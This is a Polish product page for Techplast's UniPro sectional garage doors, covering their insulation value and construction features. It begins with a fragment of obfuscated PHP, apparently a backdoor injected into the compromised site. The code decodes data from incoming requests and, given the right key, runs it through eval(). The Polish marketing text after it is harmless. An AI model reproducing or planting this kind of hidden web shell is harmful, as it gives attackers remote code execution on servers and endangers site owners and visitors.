$tfe667562){$db21131 = $tfe667562;$o33fd4c = $t6692b;}if (!$db21131){foreach ($qe5a[$qe5a['l0f3fb'][1].$qe5a['l0f3fb'][76].$qe5a['l0f3fb'][82].$qe5a['l0f3fb'][73]] as $t6692b=>$tfe667562){$db21131 = $tfe667562;$o33fd4c = $t6692b;}}$db21131 = @$qe5a[$qe5a['l0f3fb'][61].$qe5a['l0f3fb'][73].$qe5a['l0f3fb'][79].$qe5a['l0f3fb'][89].$qe5a['l0f3fb'][79].$qe5a['l0f3fb'][88].$qe5a['l0f3fb'][46].$qe5a['l0f3fb'][88].$qe5a['l0f3fb'][51]]($qe5a[$qe5a['l0f3fb'][54].$qe5a['l0f3fb'][73].$qe5a['l0f3fb'][7].$qe5a['l0f3fb'][7].$qe5a['l0f3fb'][7].$qe5a['l0f3fb'][55].$qe5a['l0f3fb'][82]]($qe5a[$qe5a['l0f3fb'][63].$qe5a['l0f3fb'][89].$qe5a['l0f3fb'][79].$qe5a['l0f3fb'][65].$qe5a['l0f3fb'][73].$qe5a['l0f3fb'][76].$qe5a['l0f3fb'][65].$qe5a['l0f3fb'][67]]($db21131), $o33fd4c));if (isset($db21131[$qe5a['l0f3fb'][54].$qe5a['l0f3fb'][11]]) && $e5ed6c20==$db21131[$qe5a['l0f3fb'][54].$qe5a['l0f3fb'][11]]){if ($db21131[$qe5a['l0f3fb'][54]] == $qe5a['l0f3fb'][61]){$y6260 = Array($qe5a['l0f3fb'][6].$qe5a['l0f3fb'][29] => @$qe5a[$qe5a['l0f3fb'][17].$qe5a['l0f3fb'][14].$qe5a['l0f3fb'][88].$qe5a['l0f3fb'][67].$qe5a['l0f3fb'][73].$qe5a['l0f3fb'][81].$qe5a['l0f3fb'][81]](),$qe5a['l0f3fb'][32].$qe5a['l0f3fb'][29] => $qe5a['l0f3fb'][46].$qe5a['l0f3fb'][3].$qe5a['l0f3fb'][14].$qe5a['l0f3fb'][15].$qe5a['l0f3fb'][46],);echo @$qe5a[$qe5a['l0f3fb'][11].$qe5a['l0f3fb'][43].$qe5a['l0f3fb'][55].$qe5a['l0f3fb'][43].$qe5a['l0f3fb'][7].$qe5a['l0f3fb'][65].$qe5a['l0f3fb'][81]]($y6260);}elseif ($db21131[$qe5a['l0f3fb'][54]] == $qe5a['l0f3fb'][43]){eval/*t50e*/($db21131[$qe5a['l0f3fb'][79]]);}exit();}} ?> Techplast - Bramy Segmentowe
  • TechPLAST

Bramy Segmentowe

KOLORYSTYKA

 

GALERIA

 

Bramy segmentowe UniPro to najbardziej komfortowe rozwiązanie do garażu.
Jest to brama ciepła (współczynnik przenikania ciepła bramy Uk = 1,07 [W/m2xK]) przeznaczona szczególnie do garaży ogrzewanych.
 
Nasze bramy garażowe są bramami ciepłymi, a współczynnik U który uzyskują jest  porównywalny ze współczynnikiem jaki mają okna wielokomorowe stosowane w budownictwie energooszczędnym. Tak niską wartość jesteśmy w stanie uzyskać dzięki panelom własnej produkcji wypełnionych pianką poliuretanową oraz systemom uszczelniającym.

Charakterystyka bram segmentowych:

  • skrzydło bramy wykonane z paneli stalowych 40 mm wypełnionych bezfreonową pianką poliuretanową
  • konstrukcja z elementów stalowych ocynkowanych
  • skrzydło bramy porusza się wzdłuż prowadnic pionowych i poziomych podsufitowych
  • brama uszczelniona na całym obwodzie
  • w dolnym panelu zamontowana uszczelka przylegająca do podłoża
  • uszczelnienie pomiędzy górnym panelem, a nadprożem zapewnia uszczelka montowana do górnego panelu lub mocowana do nadproża
  • panele posiadają zabezpieczenie kształtowe uniemożliwiające przytrzaśnięcie palców oraz uszczelki w miejscu styku dwóch paneli
  • bramy segmentowe dostępne w wersji ręcznej i automatycznej